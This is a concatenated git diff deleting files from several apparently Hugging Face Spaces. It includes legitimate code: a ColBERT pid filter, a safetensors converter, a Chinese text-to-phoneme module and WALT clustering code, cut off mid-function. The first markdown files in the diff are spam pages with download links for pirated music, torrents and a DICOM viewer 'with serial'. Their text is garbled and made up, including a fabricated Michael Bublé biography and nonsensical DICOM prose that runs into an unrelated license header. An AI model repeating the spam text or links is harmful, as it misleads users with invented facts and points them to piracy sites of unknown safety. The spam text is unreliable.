      -cirque du soleil ovo 2010 hdtvrip 720p-. Download movie "Circus" -Circus "Lake" -The Lake Circus is a science fiction fantasy film. -The Lake Circus - The Lake Circus (2010) | TvZavr.ru. -Cast: Peter O'Toole, Laia Costa, Judi Dench, Michelle Paris, Michelle Williams, Peta Sergeant, Peter McDonald. -The film "Circus Lake" tells how a young girl falls in love with a circus performer. -Circus "lake" (2005) watch online for free in good quality. -Cite web no language specified Wikipedia: Cirque Du Soleil Ovo 2010 HDTVRip 720p-torrent.zipgolkes 593faadb19 there is only 1 podcast. -How to download videos from YouTube, Vimeo, DailyMotion and other video sites through the program. -YouTube video downloader. -YouTube Downloader allows you to quickly and conveniently download videos from YouTube as well. -We only have 1 podcast. 8a78ff9644
      -
      -
      -

      diff --git a/spaces/diacanFperku/AutoGPT/Donnie Mcclurkin-Psalms Hymns And Spiritual Songs (cd1) Full Album Zip.md b/spaces/diacanFperku/AutoGPT/Donnie Mcclurkin-Psalms Hymns And Spiritual Songs (cd1) Full Album Zip.md deleted file mode 100644 index 7437c330286f6e7062abdca1155d03fbaa9a2c6b..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Donnie Mcclurkin-Psalms Hymns And Spiritual Songs (cd1) Full Album Zip.md +++ /dev/null @@ -1,6 +0,0 @@ -

      Donnie Mcclurkin-Psalms, Hymns and Spiritual Songs (cd1) full album zip


      DOWNLOAD ->->->-> https://gohhs.com/2uFTMH



      -
      -Donnie McClurkin - Psalms, Hymns & Spiritual Songs (2005) ... http://www.zshare.net/download/2103-2103-zip.html. Tonéx Presents: T.R.O.N. ... 1fdad05405
      -
      -
      -

      diff --git a/spaces/diacanFperku/AutoGPT/Michael Buble The Greatest Hits Torrent.md b/spaces/diacanFperku/AutoGPT/Michael Buble The Greatest Hits Torrent.md deleted file mode 100644 index 8e2d28b880dd6258136cb5217e14b7ed78aa114e..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/Michael Buble The Greatest Hits Torrent.md +++ /dev/null @@ -1,10 +0,0 @@ -
      -

      This intimate show really captures the spirit of the Michael Bubl Tour. Whether you are at home, the gym, or on the go, we have the perfect ticket for you. And with all seating options and ticketing locations, there is something for everyone.

      -

      michael buble the greatest hits torrent


      Download Zip ✯✯✯ https://gohhs.com/2uFTEu



      -

      For the first time ever, Michael Bubl released a Christmas album in 2014, but he had already been working on it since his Thanksgiving album, The Michael Buble Christmas Album, debuted at number two on the Billboard 200 chart. The album had been conceptualized over the years, but for its recording Buble had to secure the approval of his grandfather who had passed away a few years earlier. His grandfather's papers, and his job at the jazz music department of the California Academy of Sciences in San Francisco, helped Buble with the collection. The occasion was more than just a signing of his legal guardian. The Michael Buble Christmas Album paid tribute to the memories of his grandfather. "He'd be so proud of me," Bubl recalls.

      -

      Christmas is obviously a very happy time. But there are a few people who aren't so great during the holidays, like a certain little kid called Charlie Brown, and one of those people is Michael Bubl.

      -

      His grandfather passionately supported his career, believing Michael was destined to be an opening act for somebody in Las Vegas, he was inspired by his grandfather's jazz collection and continued to developed his classic Sinattra style.

      -

      It all started back in about 2005, I started my first year of high school and as we all know sisters seem to have the natural inclination of claiming things from each other (without the other sister knowing of course). Now, I didn't feel the need to claim my older sister's clothes and make-up but I did however find a certain something that I was just never going to give back! At that stage my sister was working and I didn't really get an allowance so I thought I could borrow a few CD's to listen to on my walkman :) Michael Bubl's first self titled album happened to be one of the CD's I borrowed.

      -

      899543212b
      -
      -
      \ No newline at end of file diff --git a/spaces/diacanFperku/AutoGPT/RadiAnt.DICOM.Viewer.1.0.4.with.Serial !FULL!.md b/spaces/diacanFperku/AutoGPT/RadiAnt.DICOM.Viewer.1.0.4.with.Serial !FULL!.md deleted file mode 100644 index e13813af903557ea2ca384e8797e296ac42d8d20..0000000000000000000000000000000000000000 --- a/spaces/diacanFperku/AutoGPT/RadiAnt.DICOM.Viewer.1.0.4.with.Serial !FULL!.md +++ /dev/null @@ -1,52 +0,0 @@ -

      RadiAnt.DICOM.Viewer.1.0.4.with.Serial


      Download Filehttps://gohhs.com/2uFV8K



      - -ization.builtin.xml.viewer.configuration.files"> - -The DICOM configuration file contains the and tag. - -The tag defines the content of the configuration file. - -The attributes of the tag are self explanatory. - -The tag may contain one node. - -The node contains the and tag. - -The DICOM configuration file ends with the tag. - -The file dicom.viewer.1.0.4.with.serialization.builtin.xml.viewer.configuration.files contains the and tag. - -The file dicom.viewer.1.0.4.with.serialization.builtin.xml.viewer.configuration.files ends with the tag. - -/* - - * Copyright (C) 2018 - present Instructure, Inc. - - * - - * This file is part of Canvas. - - * Canvas is free software: you can redistribute it and/or modify it under - - * the terms of the GNU Affero General Public License as published by the Free - - * Software Foundation, version 3 of the License. - - * Canvas is distributed in the hope that it will be useful, but WITHOUT ANY - - * WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR - - * A PARTICULAR PURPOSE. See the GNU Affero General Public License for more - - * details. - - * You should have received a copy of the GNU Affero General Public License along - - * with this program. If not, see . - - */ - -import expect from '../../../helpers/ 4fefd39f24
      -
      -
      -

      diff --git a/spaces/diagaiwei/ir_chinese_medqa/colbert/search/filter_pids.cpp b/spaces/diagaiwei/ir_chinese_medqa/colbert/search/filter_pids.cpp deleted file mode 100644 index 6f9b0909910c7bfe6d418e50a914e0130a6bb4d0..0000000000000000000000000000000000000000 --- a/spaces/diagaiwei/ir_chinese_medqa/colbert/search/filter_pids.cpp +++ /dev/null @@ -1,169 +0,0 @@ -#include -#include - -#include -#include -#include -#include - -typedef struct maxsim_args { - int tid; - int nthreads; - - int ncentroids; - int nquery_vectors; - int npids; - - int* pids; - float* centroid_scores; - int* codes; - int64_t* doclens; - int64_t* offsets; - bool* idx; - - std::priority_queue> approx_scores; -} maxsim_args_t; - -void* maxsim(void* args) { - maxsim_args_t* maxsim_args = (maxsim_args_t*)args; - - float per_doc_approx_scores[maxsim_args->nquery_vectors]; - for (int k = 0; k < maxsim_args->nquery_vectors; k++) { - per_doc_approx_scores[k] = -9999; - } - - int ndocs_per_thread = - (int)std::ceil(((float)maxsim_args->npids) / maxsim_args->nthreads); - int start = maxsim_args->tid * ndocs_per_thread; - int end = - std::min((maxsim_args->tid + 1) * ndocs_per_thread, maxsim_args->npids); - - std::unordered_set seen_codes; - - for (int i = start; i < end; i++) { - auto pid = maxsim_args->pids[i]; - for (int j = 0; j < maxsim_args->doclens[pid]; j++) { - auto code = maxsim_args->codes[maxsim_args->offsets[pid] + j]; - assert(code < maxsim_args->ncentroids); - if (maxsim_args->idx[code] && - seen_codes.find(code) == seen_codes.end()) { - for (int k = 0; k < maxsim_args->nquery_vectors; k++) { - per_doc_approx_scores[k] = - std::max(per_doc_approx_scores[k], - maxsim_args->centroid_scores - [code * maxsim_args->nquery_vectors + k]); - } - seen_codes.insert(code); - } - } - float score = 0; - for (int k = 0; k < maxsim_args->nquery_vectors; k++) { - score += per_doc_approx_scores[k]; - per_doc_approx_scores[k] = -9999; - } - maxsim_args->approx_scores.push(std::make_pair(score, pid)); - seen_codes.clear(); - } - - return NULL; -} - -void filter_pids_helper(int ncentroids, int nquery_vectors, int npids, - int* pids, float* centroid_scores, int* codes, - int64_t* doclens, int64_t* offsets, bool* idx, - int nfiltered_docs, int* filtered_pids) { - auto nthreads = at::get_num_threads(); - - pthread_t threads[nthreads]; - maxsim_args_t args[nthreads]; - - for (int i = 0; i < nthreads; i++) { - args[i].tid = i; - args[i].nthreads = nthreads; - - args[i].ncentroids = ncentroids; - args[i].nquery_vectors = nquery_vectors; - args[i].npids = npids; - - args[i].pids = pids; - args[i].centroid_scores = centroid_scores; - args[i].codes = codes; - args[i].doclens = doclens; - args[i].offsets = offsets; - args[i].idx = idx; - - args[i].approx_scores = std::priority_queue>(); - - int rc = pthread_create(&threads[i], NULL, maxsim, (void*)&args[i]); - if (rc) { - fprintf(stderr, "Unable to create thread %d: %d\n", i, rc); - std::exit(1); - } - } - - for (int i = 0; i < nthreads; i++) { - pthread_join(threads[i], NULL); - } - - std::priority_queue> global_approx_scores; - for (int i = 0; i < nthreads; i++) { - for (int j = 0; j < nfiltered_docs; j++) { - if (args[i].approx_scores.empty()) { - break; - } - global_approx_scores.push(args[i].approx_scores.top()); - args[i].approx_scores.pop(); - } - } - - for (int i = 0; i < nfiltered_docs; i++) { - std::pair score_and_pid = global_approx_scores.top(); - filtered_pids[i] = score_and_pid.second; - global_approx_scores.pop(); - } -} - -torch::Tensor filter_pids(const torch::Tensor pids, - const torch::Tensor centroid_scores, - const torch::Tensor codes, - const torch::Tensor doclens, - const torch::Tensor offsets, const torch::Tensor idx, - int nfiltered_docs) { - auto ncentroids = centroid_scores.size(0); - auto nquery_vectors = centroid_scores.size(1); - auto npids = pids.size(0); - - auto pids_a = pids.data_ptr(); - auto centroid_scores_a = centroid_scores.data_ptr(); - auto codes_a = codes.data_ptr(); - auto doclens_a = doclens.data_ptr(); - auto offsets_a = offsets.data_ptr(); - auto idx_a = idx.data_ptr(); - - int filtered_pids[nfiltered_docs]; - filter_pids_helper(ncentroids, nquery_vectors, npids, pids_a, - centroid_scores_a, codes_a, doclens_a, offsets_a, idx_a, - nfiltered_docs, filtered_pids); - - int nfinal_filtered_docs = (int)(nfiltered_docs / 4); - int final_filtered_pids[nfinal_filtered_docs]; - bool ones[ncentroids]; - for (int i = 0; i < ncentroids; i++) { - ones[i] = true; - } - filter_pids_helper(ncentroids, nquery_vectors, nfiltered_docs, - filtered_pids, centroid_scores_a, codes_a, doclens_a, - offsets_a, ones, nfinal_filtered_docs, - final_filtered_pids); - - auto options = - torch::TensorOptions().dtype(torch::kInt32).requires_grad(false); - return torch::from_blob(final_filtered_pids, {nfinal_filtered_docs}, - options) - .clone(); -} - -PYBIND11_MODULE(TORCH_EXTENSION_NAME, m) { - m.def("filter_pids_cpp", &filter_pids, "Filter pids"); -} - diff --git a/spaces/diffusers/convert/convert.py b/spaces/diffusers/convert/convert.py deleted file mode 100644 index 7244f58035dedff15c8246c83968d2c57897c676..0000000000000000000000000000000000000000 --- a/spaces/diffusers/convert/convert.py +++ /dev/null @@ -1,231 +0,0 @@ -import argparse -import json -import os -import shutil -from collections import defaultdict -from inspect import signature -from tempfile import TemporaryDirectory -from typing import Dict, List, Optional, Set - -import torch - -from huggingface_hub import CommitInfo, CommitOperationAdd, Discussion, HfApi, hf_hub_download -from huggingface_hub.file_download import repo_folder_name -from safetensors.torch import load_file, save_file -from transformers import AutoConfig -from transformers.pipelines.base import infer_framework_load_model - - -class AlreadyExists(Exception): - pass - - -def shared_pointers(tensors): - ptrs = defaultdict(list) - for k, v in tensors.items(): - ptrs[v.data_ptr()].append(k) - failing = [] - for ptr, names in ptrs.items(): - if len(names) > 1: - failing.append(names) - return failing - - -def check_file_size(sf_filename: str, pt_filename: str): - sf_size = os.stat(sf_filename).st_size - pt_size = os.stat(pt_filename).st_size - - if (sf_size - pt_size) / pt_size > 0.01: - raise RuntimeError( - f"""The file size different is more than 1%: - - {sf_filename}: {sf_size} - - {pt_filename}: {pt_size} - """ - ) - - -def rename(pt_filename: str) -> str: - filename, ext = os.path.splitext(pt_filename) - local = f"{filename}.safetensors" - local = local.replace("pytorch_model", "model") - return local - - -def convert_multi(model_id: str, folder: str) -> List["CommitOperationAdd"]: - filename = hf_hub_download(repo_id=model_id, filename="pytorch_model.bin.index.json") - with open(filename, "r") as f: - data = json.load(f) - - filenames = set(data["weight_map"].values()) - local_filenames = [] - for filename in filenames: - pt_filename = hf_hub_download(repo_id=model_id, filename=filename) - - sf_filename = rename(pt_filename) - sf_filename = os.path.join(folder, sf_filename) - convert_file(pt_filename, sf_filename) - local_filenames.append(sf_filename) - - index = os.path.join(folder, "model.safetensors.index.json") - with open(index, "w") as f: - newdata = {k: v for k, v in data.items()} - newmap = {k: rename(v) for k, v in data["weight_map"].items()} - newdata["weight_map"] = newmap - json.dump(newdata, f, indent=4) - local_filenames.append(index) - - operations = [ - CommitOperationAdd(path_in_repo=local.split("/")[-1], path_or_fileobj=local) for local in local_filenames - ] - - return operations - - -def convert_single(model_id: str, folder: str) -> List["CommitOperationAdd"]: - pt_filename = hf_hub_download(repo_id=model_id, filename="pytorch_model.bin") - - sf_name = "model.safetensors" - sf_filename = os.path.join(folder, sf_name) - convert_file(pt_filename, sf_filename) - operations = [CommitOperationAdd(path_in_repo=sf_name, path_or_fileobj=sf_filename)] - return operations - - -def convert_file( - pt_filename: str, - sf_filename: str, -): - loaded = torch.load(pt_filename, map_location="cpu") - if "state_dict" in loaded: - loaded = loaded["state_dict"] - shared = shared_pointers(loaded) - for shared_weights in shared: - for name in shared_weights[1:]: - loaded.pop(name) - - # For tensors to be contiguous - loaded = {k: v.contiguous() for k, v in loaded.items()} - - dirname = os.path.dirname(sf_filename) - os.makedirs(dirname, exist_ok=True) - save_file(loaded, sf_filename, metadata={"format": "pt"}) - check_file_size(sf_filename, pt_filename) - reloaded = load_file(sf_filename) - for k in loaded: - pt_tensor = loaded[k] - sf_tensor = reloaded[k] - if not torch.equal(pt_tensor, sf_tensor): - raise RuntimeError(f"The output tensors do not match for key {k}") - - -def create_diff(pt_infos: Dict[str, List[str]], sf_infos: Dict[str, List[str]]) -> str: - errors = [] - for key in ["missing_keys", "mismatched_keys", "unexpected_keys"]: - pt_set = set(pt_infos[key]) - sf_set = set(sf_infos[key]) - - pt_only = pt_set - sf_set - sf_only = sf_set - pt_set - - if pt_only: - errors.append(f"{key} : PT warnings contain {pt_only} which are not present in SF warnings") - if sf_only: - errors.append(f"{key} : SF warnings contain {sf_only} which are not present in PT warnings") - return "\n".join(errors) - -def previous_pr(api: "HfApi", model_id: str, pr_title: str) -> Optional["Discussion"]: - try: - discussions = api.get_repo_discussions(repo_id=model_id) - except Exception: - return None - for discussion in discussions: - if discussion.status == "open" and discussion.is_pull_request and discussion.title == pr_title: - return discussion - - -def convert_generic(model_id: str, folder: str, filenames: Set[str]) -> List["CommitOperationAdd"]: - operations = [] - - extensions = set([".bin", ".ckpt"]) - for filename in filenames: - prefix, ext = os.path.splitext(filename) - if ext in extensions: - pt_filename = hf_hub_download(model_id, filename=filename) - dirname, raw_filename = os.path.split(filename) - if raw_filename == "pytorch_model.bin": - # XXX: This is a special case to handle `transformers` and the - # `transformers` part of the model which is actually loaded by `transformers`. - sf_in_repo = os.path.join(dirname, "model.safetensors") - else: - sf_in_repo = f"{prefix}.safetensors" - sf_filename = os.path.join(folder, sf_in_repo) - convert_file(pt_filename, sf_filename) - operations.append(CommitOperationAdd(path_in_repo=sf_in_repo, path_or_fileobj=sf_filename)) - return operations - - -def convert(api: "HfApi", model_id: str, force: bool = False) -> Optional["CommitInfo"]: - pr_title = "Adding `safetensors` variant of this model" - info = api.model_info(model_id) - - def is_valid_filename(filename): - return len(filename.split("/")) > 1 or filename in ["pytorch_model.bin", "diffusion_pytorch_model.bin"] - filenames = set(s.rfilename for s in info.siblings if is_valid_filename(s.rfilename)) - - print(filenames) - with TemporaryDirectory() as d: - folder = os.path.join(d, repo_folder_name(repo_id=model_id, repo_type="models")) - os.makedirs(folder) - new_pr = None - try: - operations = None - pr = previous_pr(api, model_id, pr_title) - - library_name = getattr(info, "library_name", None) - if any(filename.endswith(".safetensors") for filename in filenames) and not force: - raise AlreadyExists(f"Model {model_id} is already converted, skipping..") - elif pr is not None and not force: - url = f"https://huggingface.co/{model_id}/discussions/{pr.num}" - new_pr = pr - raise AlreadyExists(f"Model {model_id} already has an open PR check out {url}") - else: - print("Convert generic") - operations = convert_generic(model_id, folder, filenames) - - if operations: - new_pr = api.create_commit( - repo_id=model_id, - operations=operations, - commit_message=pr_title, - create_pr=True, - ) - print(f"Pr created at {new_pr.pr_url}") - else: - print("No files to convert") - finally: - shutil.rmtree(folder) - return new_pr - - -if __name__ == "__main__": - DESCRIPTION = """ - Simple utility tool to convert automatically some weights on the hub to `safetensors` format. - It is PyTorch exclusive for now. - It works by downloading the weights (PT), converting them locally, and uploading them back - as a PR on the hub. - """ - parser = argparse.ArgumentParser(description=DESCRIPTION) - parser.add_argument( - "model_id", - type=str, - help="The name of the model on the hub to convert. E.g. `gpt2` or `facebook/wav2vec2-base-960h`", - ) - parser.add_argument( - "--force", - action="store_true", - help="Create the PR even if it already exists of if the model was already converted.", - ) - args = parser.parse_args() - model_id = args.model_id - api = HfApi() - convert(api, model_id, force=args.force) diff --git a/spaces/digitalOSHO/webui/oh-no.py b/spaces/digitalOSHO/webui/oh-no.py deleted file mode 100644 index e8c0f3bd8d72805b4ee69d4d0fd9133347d00f92..0000000000000000000000000000000000000000 --- a/spaces/digitalOSHO/webui/oh-no.py +++ /dev/null @@ -1,14 +0,0 @@ -import gradio as gr - -block = gr.Blocks() - -def run(): - with block: - gr.Markdown( - """ -

      oh no 😐 something wrong with the 🤗 hugging face servers 😐 hopefully, it will be fixed soon

      - """) - block.launch(server_name="0.0.0.0", server_port=7860) - -if __name__ == "__main__": - run() \ No newline at end of file diff --git a/spaces/digitalxingtong/Kino-Bert-VITS2/text/chinese.py b/spaces/digitalxingtong/Kino-Bert-VITS2/text/chinese.py deleted file mode 100644 index 276753880b73de2e8889dcb2101cd98c09e0710b..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Kino-Bert-VITS2/text/chinese.py +++ /dev/null @@ -1,193 +0,0 @@ -import os -import re - -import cn2an -from pypinyin import lazy_pinyin, Style - -from text import symbols -from text.symbols import punctuation -from text.tone_sandhi import ToneSandhi - -current_file_path = os.path.dirname(__file__) -pinyin_to_symbol_map = {line.split("\t")[0]: line.strip().split("\t")[1] for line in - open(os.path.join(current_file_path, 'opencpop-strict.txt')).readlines()} - -import jieba.posseg as psg - - -rep_map = { - ':': ',', - ';': ',', - ',': ',', - '。': '.', - '!': '!', - '?': '?', - '\n': '.', - "·": ",", - '、': ",", - '...': '…', - '$': '.', - '“': "'", - '”': "'", - '‘': "'", - '’': "'", - '(': "'", - ')': "'", - '(': "'", - ')': "'", - '《': "'", - '》': "'", - '【': "'", - '】': "'", - '[': "'", - ']': "'", - '—': "-", - '~': "-", - '~': "-", - '「': "'", - '」': "'", - -} - -tone_modifier = ToneSandhi() - -def replace_punctuation(text): - text = text.replace("嗯", "恩").replace("呣","母") - pattern = re.compile('|'.join(re.escape(p) for p in rep_map.keys())) - - replaced_text = pattern.sub(lambda x: rep_map[x.group()], text) - - replaced_text = re.sub(r'[^\u4e00-\u9fa5'+"".join(punctuation)+r']+', '', replaced_text) - - return replaced_text - -def g2p(text): - pattern = r'(?<=[{0}])\s*'.format(''.join(punctuation)) - sentences = [i for i in re.split(pattern, text) if i.strip()!=''] - phones, tones, word2ph = _g2p(sentences) - assert sum(word2ph) == len(phones) - assert len(word2ph) == len(text) #Sometimes it will crash,you can add a try-catch. - phones = ['_'] + phones + ["_"] - tones = [0] + tones + [0] - word2ph = [1] + word2ph + [1] - return phones, tones, word2ph - - -def _get_initials_finals(word): - initials = [] - finals = [] - orig_initials = lazy_pinyin( - word, neutral_tone_with_five=True, style=Style.INITIALS) - orig_finals = lazy_pinyin( - word, neutral_tone_with_five=True, style=Style.FINALS_TONE3) - for c, v in zip(orig_initials, orig_finals): - initials.append(c) - finals.append(v) - return initials, finals - - -def _g2p(segments): - phones_list = [] - tones_list = [] - word2ph = [] - for seg in segments: - pinyins = [] - # Replace all English words in the sentence - seg = re.sub('[a-zA-Z]+', '', seg) - seg_cut = psg.lcut(seg) - initials = [] - finals = [] - seg_cut = tone_modifier.pre_merge_for_modify(seg_cut) - for word, pos in seg_cut: - if pos == 'eng': - continue - sub_initials, sub_finals = _get_initials_finals(word) - sub_finals = tone_modifier.modified_tone(word, pos, - sub_finals) - initials.append(sub_initials) - finals.append(sub_finals) - - # assert len(sub_initials) == len(sub_finals) == len(word) - initials = sum(initials, []) - finals = sum(finals, []) - # - for c, v in zip(initials, finals): - raw_pinyin = c+v - # NOTE: post process for pypinyin outputs - # we discriminate i, ii and iii - if c == v: - assert c in punctuation - phone = [c] - tone = '0' - word2ph.append(1) - else: - v_without_tone = v[:-1] - tone = v[-1] - - pinyin = c+v_without_tone - assert tone in '12345' - - if c: - # 多音节 - v_rep_map = { - "uei": 'ui', - 'iou': 'iu', - 'uen': 'un', - } - if v_without_tone in v_rep_map.keys(): - pinyin = c+v_rep_map[v_without_tone] - else: - # 单音节 - pinyin_rep_map = { - 'ing': 'ying', - 'i': 'yi', - 'in': 'yin', - 'u': 'wu', - } - if pinyin in pinyin_rep_map.keys(): - pinyin = pinyin_rep_map[pinyin] - else: - single_rep_map = { - 'v': 'yu', - 'e': 'e', - 'i': 'y', - 'u': 'w', - } - if pinyin[0] in single_rep_map.keys(): - pinyin = single_rep_map[pinyin[0]]+pinyin[1:] - - assert pinyin in pinyin_to_symbol_map.keys(), (pinyin, seg, raw_pinyin) - phone = pinyin_to_symbol_map[pinyin].split(' ') - word2ph.append(len(phone)) - - phones_list += phone - tones_list += [int(tone)] * len(phone) - return phones_list, tones_list, word2ph - - - -def text_normalize(text): - numbers = re.findall(r'\d+(?:\.?\d+)?', text) - for number in numbers: - text = text.replace(number, cn2an.an2cn(number), 1) - text = replace_punctuation(text) - return text - -def get_bert_feature(text, word2ph): - from text import chinese_bert - return chinese_bert.get_bert_feature(text, word2ph) - -if __name__ == '__main__': - from text.chinese_bert import get_bert_feature - text = "啊!但是《原神》是由,米哈\游自主, [研发]的一款全.新开放世界.冒险游戏" - text = text_normalize(text) - print(text) - phones, tones, word2ph = g2p(text) - bert = get_bert_feature(text, word2ph) - - print(phones, tones, word2ph, bert.shape) - - -# # 示例用法 -# text = "这是一个示例文本:,你好!这是一个测试...." -# print(g2p_paddle(text)) # 输出: 这是一个示例文本你好这是一个测试 diff --git a/spaces/dineshreddy/WALT/cwalt/Clip_WALT_Generate.py b/spaces/dineshreddy/WALT/cwalt/Clip_WALT_Generate.py deleted file mode 100644 index 09540a37a3a94600ac01a585f58b09270d070da7..0000000000000000000000000000000000000000 --- a/spaces/dineshreddy/WALT/cwalt/Clip_WALT_Generate.py +++ /dev/null @@ -1,284 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- -""" -Created on Fri May 20 15:15:11 2022 - -@author: dinesh -""" - -from collections import OrderedDict -from matplotlib import pyplot as plt -from .utils import * -import scipy.interpolate - -from scipy import interpolate -from .clustering_utils import * -import glob -import cv2 -from PIL import Image - - -import json -import cv2 - -import numpy as np -from tqdm import tqdm - - -def ignore_indexes(tracks_all, labels_all): - # get repeating bounding boxes - get_indexes = lambda x, xs: [i for (y, i) in zip(xs, range(len(xs))) if x == y] - ignore_ind = [] - for index, track in enumerate(tracks_all): - print('in ignore', index, len(tracks_all)) - if index in ignore_ind: - continue - - if labels_all[index] < 1 or labels_all[index] > 3: - ignore_ind.extend([index]) - - ind = get_indexes(track, tracks_all) - if len(ind) > 30: - ignore_ind.extend(ind) - - return ignore_ind - -def repeated_indexes_old(tracks_all,ignore_ind, unoccluded_indexes=None): - # get repeating bounding boxes - get_indexes = lambda x, xs: [i for (y, i) in zip(xs, range(len(xs))) if bb_intersection_over_union(x, y) > 0.8 and i not in ignore_ind] - repeat_ind = [] - repeat_inds =[] - if unoccluded_indexes == None: - for index, track in enumerate(tracks_all): - if index in repeat_ind or index in ignore_ind: - continue - ind = get_indexes(track, tracks_all) - if len(ind) > 20: - repeat_ind.extend(ind) - repeat_inds.append([ind,track]) - else: - for index in unoccluded_indexes: - if index in repeat_ind or index in ignore_ind: - continue - ind = get_indexes(tracks_all[index], tracks_all) - if len(ind) > 3: - repeat_ind.extend(ind) - repeat_inds.append([ind,tracks_all[index]]) - return repeat_inds - -def get_unoccluded_instances(timestamps_final, tracks_all, ignore_ind=[], threshold = 0.01): - get_indexes = lambda x, xs: [i for (y, i) in zip(xs, range(len(xs))) if x==y] - unoccluded_indexes = [] - time_checked = [] - stationary_obj = [] - count =0 - - for time in tqdm(np.unique(timestamps_final), desc="Detecting Unocclued objects in Image "): - count += 1 - if [time.year,time.month, time.day, time.hour, time.minute, time.second, time.microsecond] in time_checked: - analyze_bb = [] - for ind in unoccluded_indexes_time: - for ind_compare in same_time_instances: - iou = bb_intersection_over_union(tracks_all[ind], tracks_all[ind_compare]) - if iou < 0.5 and iou > 0: - analyze_bb.extend([ind_compare]) - if iou > 0.99: - stationary_obj.extend([str(ind_compare)+'+'+str(ind)]) - - for ind in analyze_bb: - occ = False - for ind_compare in same_time_instances: - if bb_intersection_over_union_unoccluded(tracks_all[ind], tracks_all[ind_compare], threshold=threshold) > threshold and ind_compare != ind: - occ = True - break - if occ == False: - unoccluded_indexes.extend([ind]) - continue - - same_time_instances = get_indexes(time,timestamps_final) - unoccluded_indexes_time = [] - - for ind in same_time_instances: - if tracks_all[ind][4] < 0.9 or ind in ignore_ind:# or ind != 1859: - continue - occ = False - for ind_compare in same_time_instances: - if bb_intersection_over_union_unoccluded(tracks_all[ind], tracks_all[ind_compare], threshold=threshold) > threshold and ind_compare != ind and tracks_all[ind_compare][4] < 0.5: - occ = True - break - if occ==False: - unoccluded_indexes.extend([ind]) - unoccluded_indexes_time.extend([ind]) - time_checked.append([time.year,time.month, time.day, time.hour, time.minute, time.second, time.microsecond]) - return unoccluded_indexes,stationary_obj - -def visualize_unoccluded_detection(timestamps_final,tracks_all,segmentation_all, unoccluded_indexes, cwalt_data_path, camera_name, ignore_ind=[]): - tracks_final = [] - tracks_final.append([]) - try: - os.mkdir(cwalt_data_path + '/' + camera_name+'_unoccluded_car_detection/') - except: - print('Unoccluded debugging exists') - - for time in tqdm(np.unique(timestamps_final), desc="Visualizing Unocclued objects in Image "): - get_indexes = lambda x, xs: [i for (y, i) in zip(xs, range(len(xs))) if x==y] - ind = get_indexes(time, timestamps_final) - image_unocc = False - for index in ind: - if index not in unoccluded_indexes: - continue - else: - image_unocc = True - break - if image_unocc == False: - continue - - for week_loop in range(5): - try: - image = np.array(Image.open(cwalt_data_path+'/week' +str(week_loop)+'/'+ str(time).replace(' ','T').replace(':','-').split('+')[0] + '.jpg')) - break - except: - continue - - try: - mask = image*0 - except: - print('image not found for ' + str(time).replace(' ','T').replace(':','-').split('+')[0] + '.jpg' ) - continue - image_original = image.copy() - - for index in ind: - track = tracks_all[index] - - if index in ignore_ind: - continue - if index not in unoccluded_indexes: - continue - try: - bb_left, bb_top, bb_width, bb_height, confidence, id = track - except: - bb_left, bb_top, bb_width, bb_height, confidence = track - - if confidence > 0.6: - mask = poly_seg(image, segmentation_all[index]) - cv2.imwrite(cwalt_data_path + '/' + camera_name+'_unoccluded_car_detection/' + str(index)+'.png', mask[:, :, ::-1]) - -def repeated_indexes(tracks_all,ignore_ind, repeat_count = 10, unoccluded_indexes=None): - get_indexes = lambda x, xs: [i for (y, i) in zip(xs, range(len(xs))) if bb_intersection_over_union(x, y) > 0.8 and i not in ignore_ind] - repeat_ind = [] - repeat_inds =[] - if unoccluded_indexes == None: - for index, track in enumerate(tracks_all): - if index in repeat_ind or index in ignore_ind: - continue - - ind = get_indexes(track, tracks_all) - if len(ind) > repeat_count: - repeat_ind.extend(ind) - repeat_inds.append([ind,track]) - else: - for index in unoccluded_indexes: - if index in repeat_ind or index in ignore_ind: - continue - ind = get_indexes(tracks_all[index], tracks_all) - if len(ind) > repeat_count: - repeat_ind.extend(ind) - repeat_inds.append([ind,tracks_all[index]]) - - - return repeat_inds - -def poly_seg(image, segm): - poly = np.array(segm).reshape((int(len(segm)/2), 2)) - overlay = image.copy() - alpha = 0.5 - cv2.fillPoly(overlay, [poly], color=(255, 255, 0)) - cv2.addWeighted(overlay, alpha, image, 1 - alpha, 0, image) - return image - -def visualize_unoccuded_clusters(repeat_inds, tracks, segmentation_all, timestamps_final, cwalt_data_path): - for index_, repeat_ind in enumerate(repeat_inds): - image = np.array(Image.open(cwalt_data_path+'/'+'T18-median_image.jpg')) - try: - os.mkdir(cwalt_data_path+ '/Cwalt_database/') - except: - print('folder exists') - try: - os.mkdir(cwalt_data_path+ '/Cwalt_database/' + str(index_) +'/') - except: - print(cwalt_data_path+ '/Cwalt_database/' + str(index_) +'/') - - for i in repeat_ind[0]: - try: - bb_left, bb_top, bb_width, bb_height, confidence = tracks[i]#bbox - except: - bb_left, bb_top, bb_width, bb_height, confidence, track_id = tracks[i]#bbox - - cv2.rectangle(image,(int(bb_left), int(bb_top)),(int(bb_left+bb_width), int(bb_top+bb_height)),(0, 0, 255), 2) - time = timestamps_final[i] - for week_loop in range(5): - try: - image1 = np.array(Image.open(cwalt_data_path+'/week' +str(week_loop)+'/'+ str(time).replace(' ','T').replace(':','-').split('+')[0] + '.jpg')) - break - except: - continue - - crop = image1[int(bb_top): int(bb_top + bb_height), int(bb_left):int(bb_left + bb_width)] - cv2.imwrite(cwalt_data_path+ '/Cwalt_database/' + str(index_) +'/o_' + str(i) +'.jpg', crop[:, :, ::-1]) - image1 = poly_seg(image1,segmentation_all[i]) - crop = image1[int(bb_top): int(bb_top + bb_height), int(bb_left):int(bb_left + bb_width)] - cv2.imwrite(cwalt_data_path+ '/Cwalt_database/' + str(index_) +'/' + str(i)+'.jpg', crop[:, :, ::-1]) - if index_ > 100: - break - - cv2.imwrite(cwalt_data_path+ '/Cwalt_database/' + str(index_) +'.jpg', image[:, :, ::-1]) - -def Get_unoccluded_objects(camera_name, debug = False, scale=True): - cwalt_data_path = 'data/' + camera_name - data_folder = cwalt_data_path - json_file_path = cwalt_data_path + '/' + camera_name + '.json' - - with open(json_file_path, 'r') as j: - annotations = json.loads(j.read()) - - tracks_all = [parse_bbox(anno['bbox']) for anno in annotations] - segmentation_all = [parse_bbox(anno['segmentation']) for anno in annotations] - labels_all = [anno['label_id'] for anno in annotations] - timestamps_final = [parse(anno['time']) for anno in annotations] - - if scale ==True: - scale_factor = 2 